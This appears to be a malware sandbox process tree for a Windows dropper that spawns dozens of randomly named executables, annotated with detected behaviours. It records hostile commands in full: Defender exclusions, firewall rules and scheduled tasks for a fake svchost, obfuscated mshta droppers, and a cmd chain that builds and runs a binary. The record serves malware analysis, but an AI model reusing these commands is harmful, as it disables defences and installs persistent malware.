                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7fff97a8dec0,0x7fff97a8ded0,0x7fff97a8dee0
                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                    PID:6256
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1560,13355432740013740882,12905107043930856720,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9984_2077906785" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1564 /prefetch:2
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:10904
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,13355432740013740882,12905107043930856720,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9984_2077906785" --mojo-platform-channel-handle=1836 /prefetch:8
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                        PID:10932
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1560,13355432740013740882,12905107043930856720,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9984_2077906785" --mojo-platform-channel-handle=2168 /prefetch:8
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                          PID:12132
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\Ad4QtSktSm2S5UgXRwo2ZgAQ.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\Ad4QtSktSm2S5UgXRwo2ZgAQ.exe"
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                    PID:8116
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                  PID:4260
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                  PID:7924
                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\GJ43U8NcO3U6Txj9hUxuye_3.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\GJ43U8NcO3U6Txj9hUxuye_3.exe"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                PID:6212
                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:2660
                                                                                                                                                                                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:8136
                                                                                                                                                                                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:7888
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\a6SVXJIPutyy4R33oulgeZj0.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\a6SVXJIPutyy4R33oulgeZj0.exe"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                      PID:6204
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\djEtAPZoygklArjDguoJzbCI.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\djEtAPZoygklArjDguoJzbCI.exe"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:6180
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:8144
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                              PID:8160
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\7ZAk5tyehrS6QMGzhDW4p60j.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\7ZAk5tyehrS6QMGzhDW4p60j.exe"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                          PID:6172
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\DCN2utUjyo5ePcbvDyHsbfYe.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\DCN2utUjyo5ePcbvDyHsbfYe.exe"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                          PID:6156
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\rGsziXgh3KIAMd5Q00e5vax5.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\rGsziXgh3KIAMd5Q00e5vax5.exe"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:1512
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 672
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              PID:1860
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 632
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              PID:5904
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 636
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              PID:7568
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 1120
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              PID:8136
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\JPC3BYc6C7fuhuzmTHwGtSiL.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\JPC3BYc6C7fuhuzmTHwGtSiL.exe"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                            PID:2804
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\q42vqlfsrF21POPd37ZObw10.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\q42vqlfsrF21POPd37ZObw10.exe"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                            PID:4204
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\dXA_bhtx7vqDXffG4SvHbUXI.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\dXA_bhtx7vqDXffG4SvHbUXI.exe"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                            PID:4724
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\dXA_bhtx7vqDXffG4SvHbUXI.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\dXA_bhtx7vqDXffG4SvHbUXI.exe"
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                              PID:6772
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\ZS0KehFbT7OVgptT6Lrlr0k_.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\ZS0KehFbT7OVgptT6Lrlr0k_.exe"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                            PID:7012
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\ZS0KehFbT7OVgptT6Lrlr0k_.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\ZS0KehFbT7OVgptT6Lrlr0k_.exe"
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:4120
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\0X2QvIucAXEhxeEEvbEMocta.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\0X2QvIucAXEhxeEEvbEMocta.exe"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:4764
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\0X2QvIucAXEhxeEEvbEMocta.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\0X2QvIucAXEhxeEEvbEMocta.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:7396
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\0X2QvIucAXEhxeEEvbEMocta.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\0X2QvIucAXEhxeEEvbEMocta.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:5516
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                                                                                                                                                                                        8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:7496
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                              PID:2108
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                  PID:5312
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                  PID:8544
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                      PID:7112
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                        PID:5068
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                          PID:8064
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                          msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                            PID:8056
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                      taskkill -im "0X2QvIucAXEhxeEEvbEMocta.exe" -F
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                      PID:4144
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\1a7k9jMgmtYaEjtvNv9t6baq.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\1a7k9jMgmtYaEjtvNv9t6baq.exe"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                PID:768
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\fCW5kUXiJ8PkhQixCDJJr8M9.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\fCW5kUXiJ8PkhQixCDJJr8M9.exe"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:6900
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 1136
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:7992
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 1152
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:8024
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\kUStt_Leet7DYkxnzBP30lMT.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\kUStt_Leet7DYkxnzBP30lMT.exe"
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:5068
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\kUStt_Leet7DYkxnzBP30lMT.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\kUStt_Leet7DYkxnzBP30lMT.exe"
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:7556
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\0GvLb4TJYATOzPU_kxq_j8dg.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\0GvLb4TJYATOzPU_kxq_j8dg.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:6796
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\P6h7H85Tyg2GB8_vVTclub_Q.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\P6h7H85Tyg2GB8_vVTclub_Q.exe"
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:4412
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\W66fJ7XSAyb7Lbu_5FoS13ze.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\W66fJ7XSAyb7Lbu_5FoS13ze.exe"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:4768
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\2511860.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\2511860.exe"
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:7100
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\3237872.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\3237872.exe"
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:2768
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\453760.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\453760.exe"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                  PID:6396
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\5688911.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\5688911.exe"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                  PID:6888
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1365830.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\1365830.exe"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                                  PID:6468
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\2807092.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\2807092.exe"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                  PID:6240
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\ioAZydD7BulFkVWD2TUKcoBH.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\ioAZydD7BulFkVWD2TUKcoBH.exe"
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                PID:7180
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:6376
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:7988
                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:5068
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                                                                                                                        schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                        PID:5992
                                                                                                                                                                                                                                                                                                                      • C:\Windows\System\svchost.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System\svchost.exe" formal
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                        PID:6844
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                            PID:8608
                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                              PID:8956
                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                PID:8992
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05851d7f13.exe
                                                                                                                                                                                                                                                                                                                          Fri05851d7f13.exe
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                          PID:4100
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05f84fa77402bf.exe
                                                                                                                                                                                                                                                                                                                          Fri05f84fa77402bf.exe
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                          PID:1356
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05f84fa77402bf.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05f84fa77402bf.exe
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            PID:4848
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                          PID:4988
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
